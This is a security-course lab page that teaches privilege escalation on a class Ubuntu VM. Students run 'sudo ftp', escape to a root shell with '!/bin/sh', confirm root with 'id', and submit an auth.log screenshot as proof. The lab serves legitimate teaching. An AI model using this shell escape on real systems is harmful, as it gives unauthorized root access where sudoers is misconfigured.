ComputerSecurityStudent (CSS) [Login] [Join Now]




|UNIX >> SUDO >> Current Page |Views: 20493

(Ethical Hacking: sudo)

{ sudo ftp exploit}


Background Information
  • Background
    • If the /etc/sudoers file is misconfigured for a particular user, then that specific user can use sudo command to gain root access.

     

Prerequisite
  1. Login to your TargetUbuntu02 VM, as username instructor
    • For those of you that do not have access to my class, the TargetUbuntu02 VM is a Linux Ubuntu Operating System.

     

Section 1: First we need to create an exploit file
  1. Command: sudo ftp
    • sudo allows a permitted user to execute a command as the superuser or another user, as specified in the sudoers file.

     

     

  2. Command: !/bin/sh (See Below)
    • At the "ftp>" prompt, escape out of the ftp program into a root shell by typing "!/bin/sh" and then pressing enter.

     

  3. Command: id (See Below)
    • Congratulations you are now the root user.

     

Section 2: Exiting the root shell
  1. To exit out of the root shell.
    • Command:  exit

     

  2. To exit out of ftp
    • Command:  quit

     

Proof of Lab
  1. Command: grep -i sudo /var/log/auth.log | grep -i ftp | tail -1
    • Do a screen print similar to the picture below and paste picture into a word document.
    • Submit to moodle.


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth